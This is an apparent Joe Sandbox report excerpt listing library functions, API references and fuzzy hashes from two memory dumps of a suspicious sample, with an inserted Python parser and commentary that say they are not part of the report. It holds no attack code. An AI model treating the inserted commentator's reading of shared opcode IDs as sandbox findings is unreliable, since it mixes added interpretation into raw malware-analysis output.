• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024C513D,00000000,00000000,00000000,00000000,?,024C53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024C51E2
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
• GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
• Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024B63AF
• Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024B63C3
• Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024B63DB
• Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024B63F3
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
• String ID:
• API String ID: 78362717-0
                                                                                                                                                                                                                                            • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                            • Instruction ID: 27135b7cb652ef6265316e3c59b4e04065e28b3d5c569a891c49cc10221611e2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B01D636600114B7DF17EE65C850AEF779EDF55350F01045BEC21AB381DAB1ED118AB0
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::location::_Assign.LIBCMT ref: 024B2BB1
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024B2BCF
                                                                                                                                                                                                                                              • Part of subcall function 024A8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024A86A8
                                                                                                                                                                                                                                              • Part of subcall function 024A8687: Hash.LIBCMT ref: 024A86E8
                                                                                                                                                                                                                                            • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024B2BD8
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024B2BF8
                                                                                                                                                                                                                                              • Part of subcall function 024AF6DF: Hash.LIBCMT ref: 024AF6F1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2250070497-0
                                                                                                                                                                                                                                            • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                            • Instruction ID: 98bbc2ef6c4a819673a9bd935fc39826533340a999af2b5411199a66d344df78
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C117C76800604ABC715DF65C890ACAF7B9BF59320B014A1FE95A8B551DBB0E904CBA0
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
                                                                                                                                                                                                                                            • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
                                                                                                                                                                                                                                            • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
                                                                                                                                                                                                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 78362717-0
                                                                                                                                                                                                                                            • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                            • Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::location::_Assign.LIBCMT ref: 024B2BB1
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024B2BCF
                                                                                                                                                                                                                                              • Part of subcall function 024A8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024A86A8
                                                                                                                                                                                                                                              • Part of subcall function 024A8687: Hash.LIBCMT ref: 024A86E8
                                                                                                                                                                                                                                            • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024B2BD8
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024B2BF8
                                                                                                                                                                                                                                              • Part of subcall function 024AF6DF: Hash.LIBCMT ref: 024AF6F1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2250070497-0
                                                                                                                                                                                                                                            • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                            • Instruction ID: 04b7ef5611412a3e6f83fff8b8e3c99265c916775d7181590b29daf7a5025c4d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD011776400604ABC715DF6AC891EDAB7F9FF58320B008A1EE55A87650DBB0F944CB60
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 024950D1
                                                                                                                                                                                                                                              • Part of subcall function 0249BDAE: __EH_prolog3_GS.LIBCMT ref: 0249BDB5
                                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 0249511C
                                                                                                                                                                                                                                            • __Getcoll.LIBCPMT ref: 0249512B
                                                                                                                                                                                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0249513B
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1836011271-0
                                                                                                                                                                                                                                            • Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                                                                                                                                                            • Instruction ID: 5eb145ec457a884126c599b5249d2f305a822d70e51bdbe2bcda5e293ade1c3d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87018871D10208AFEF01EFA9D481B9DBBB1BF54315F50812FD055AB280CB749544CF95
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 02495B8D
                                                                                                                                                                                                                                              • Part of subcall function 0249BDAE: __EH_prolog3_GS.LIBCMT ref: 0249BDB5
                                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 02495BD8
                                                                                                                                                                                                                                            • __Getcoll.LIBCPMT ref: 02495BE7
                                                                                                                                                                                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02495BF7
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1836011271-0
                                                                                                                                                                                                                                            • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                            • Instruction ID: 76308099f333d1b1bb664119fadcda707349a68d7ef611e96cc11610f4682a43
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD019A71900208EFEF00EFA9D480BAEBBB1BF54315F20802FD055AB280CBB89944CF94
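The function entries above repeat one fixed layout: an optional "APIs" list, a "Memory Dump Source" block naming the dump and its base offset, and a "Similarity" block carrying the API ID, Opcode ID, Instruction ID and fuzzy hashes. The following parser is an added example and is not part of the Joe Sandbox report or of Joe Sandbox's own tooling. It assumes only what this excerpt shows: bare label lines open a section, "• Key: value" bullets fill it, "Part of subcall function XXXXXXXX:" prefixes nested API references, and the "Instruction Fuzzy Hash" bullet closes an entry. The input is an abbreviated copy (labelled as such) of three entries from this section; the reading that an Opcode ID shared by entries from dumps at different base offsets means the same function code is present in both memory regions is the author's interpretation of the field, not a statement from the report.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Regexes for the two bullet shapes that carry structured values in the listing.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>.+?)\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
SOURCE_RE = re.compile(
    r"^(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)$"
)

# Constructed input: three entries copied from the report excerpt, with some
# bullets (Snapshot File, String ID, Opcode Fuzzy Hash) left out for brevity.
REPORT_EXCERPT = """\
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Yara matches
Similarity
• API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
• Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
• Instruction ID: 27135b7cb652ef6265316e3c59b4e04065e28b3d5c569a891c49cc10221611e2
• Instruction Fuzzy Hash: 5B01D636600114B7DF17EE65C850AEF779EDF55350F01045BEC21AB381DAB1ED118AB0
APIs
• Concurrency::location::_Assign.LIBCMT ref: 024B2BB1
• Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024B2BCF
  • Part of subcall function 024A8687: Hash.LIBCMT ref: 024A86E8
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Yara matches
Similarity
• Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
• Instruction Fuzzy Hash: 8C117C76800604ABC715DF65C890ACAF7B9BF59320B014A1FE95A8B551DBB0E904CBA0
APIs
• Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
• Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
• Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
• Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
• Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
"""


@dataclass(frozen=True)
class ApiRef:
    api: str                      # library symbol as the report names it
    ref: int                      # address of the call site in the dump
    caller: Optional[int] = None  # set when the line is a "Part of subcall function" entry


@dataclass
class FunctionEntry:
    apis: List[ApiRef] = field(default_factory=list)
    offset: int = 0               # base address of the memory dump the function was found in
    based_on_pe: bool = False     # true when the dump is the mapped PE image, not a raw allocation
    yara_label: bool = False      # a "Yara matches" label was present for this entry in the excerpt
    fields: Dict[str, str] = field(default_factory=dict)  # remaining "• Key: value" bullets

    @property
    def opcode_id(self) -> str:
        return self.fields.get("Opcode ID", "")


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split the listing into entries; an entry is closed by its Instruction Fuzzy Hash bullet.
    A trailing entry cut off before that bullet (as at a page boundary) is dropped."""
    entries: List[FunctionEntry] = []
    cur, section = FunctionEntry(), ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):          # bare label lines switch the section
            section = line
            cur.yara_label |= section == "Yara matches"
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                cur.apis.append(ApiRef(m["api"], int(m["ref"], 16),
                                       int(m["caller"], 16) if m["caller"] else None))
            continue
        key, _, value = (s.strip() for s in body.partition(":"))
        if key == "Source File":
            m = SOURCE_RE.match(value)
            if m:
                cur.offset, cur.based_on_pe = int(m["offset"], 16), m["pe"] == "true"
                cur.fields[key] = m["file"]
            continue
        cur.fields[key] = value
        if key == "Instruction Fuzzy Hash":  # last bullet of an entry: finalize it
            entries.append(cur)
            cur = FunctionEntry()
    return entries


def shared_functions(entries: List[FunctionEntry]) -> Dict[str, List[int]]:
    """Opcode IDs that occur in more than one dump, mapped to the sorted dump base offsets.
    Under the interpretation stated in the lead-in, these are functions whose code is
    present both in the mapped PE image and in a separately allocated region."""
    by_opcode: Dict[str, set] = defaultdict(set)
    for e in entries:
        if e.opcode_id:
            by_opcode[e.opcode_id].add(e.offset)
    return {oid: sorted(offs) for oid, offs in by_opcode.items() if len(offs) > 1}


if __name__ == "__main__":
    parsed = parse_entries(REPORT_EXCERPT)
    for oid, offs in shared_functions(parsed).items():
        print(oid[:16], "present at", ", ".join(f"{o:08X}" for o in offs))
```

Running the block against the excerpt reports the one Opcode ID that this section lists under both the 00400000 (based on PE: true) and the 02490000 (based on PE: false) dumps; the Instruction IDs of those two entries differ, so only the opcode-level hash, not the full instruction bytes, is identical between the two regions.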
APIs
• __EH_prolog3_GS.LIBCMT ref: 00405926
  • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
• std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
• __Getcoll.LIBCPMT ref: 00405980
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
• String ID:
• API String ID: 1836011271-0
• Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
• Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024AC170
                                                                                                                                                                                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024AC180
                                                                                                                                                                                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024AC190
                                                                                                                                                                                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024AC1A4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3973403980-0
                                                                                                                                                                                                                                            • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                            • Instruction ID: d86c9070bf739f4af1e02929b4a024fd0d09b821d27c0afaf1be00be7cb3fbb9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF01B67A504149BBDF929F94DC918AE3BA6AF35350F048517F91888170D732C6B1EF85
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                                                                                                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                                                                                                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                                                                                                                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3973403980-0
                                                                                                                                                                                                                                            • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                            • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 024A378C
                                                                                                                                                                                                                                              • Part of subcall function 024A2B16: ___crtGetTimeFormatEx.LIBCMT ref: 024A2B2C
                                                                                                                                                                                                                                              • Part of subcall function 024A2B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 024A2B4B
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 024A37A8
                                                                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A37BE
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A37CC
                                                                                                                                                                                                                                              • Part of subcall function 024A28EC: SetThreadPriority.KERNEL32(?,?), ref: 024A28F8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1674182817-0
                                                                                                                                                                                                                                            • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                            • Instruction ID: 81d91a01cb2e836bed8c616c328e87e10c7f04290d2964ef754f1e950751ffd1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4F027B6A002153AD720FB724C06FBB3A9C9F20740F50086FB905E2180FAD8D4009AB4
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024A1342
                                                                                                                                                                                                                                              • Part of subcall function 024A0BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 024A0BD6
                                                                                                                                                                                                                                              • Part of subcall function 024A0BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 024A0BF7
                                                                                                                                                                                                                                            • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024A1355
                                                                                                                                                                                                                                            • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024A1361
                                                                                                                                                                                                                                            • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024A136A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4284812201-0
                                                                                                                                                                                                                                            • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                            • Instruction ID: b688c43a0d78029303f3726da037d7ece2edc5ebd6e53a3e4cfd1592b8ff110b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF0B431641704A7AF147EBA08316BE35975FB1314F04416FE51AAF3C0DFB19E059B94
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                                                                                                                                                                                                              • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                                                                                                                                                                                                              • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                                                                                                                                                                                                            • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                                                                                                                                                                                                            • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                                                                                                                                                                                                            • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4284812201-0
• Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
• Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
• Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
• Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
APIs
• Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
  • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
  • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
• GetLastError.KERNEL32 ref: 00413541
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
• __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
  • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
• String ID:
• API String ID: 1674182817-0
• Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
• Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
• Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
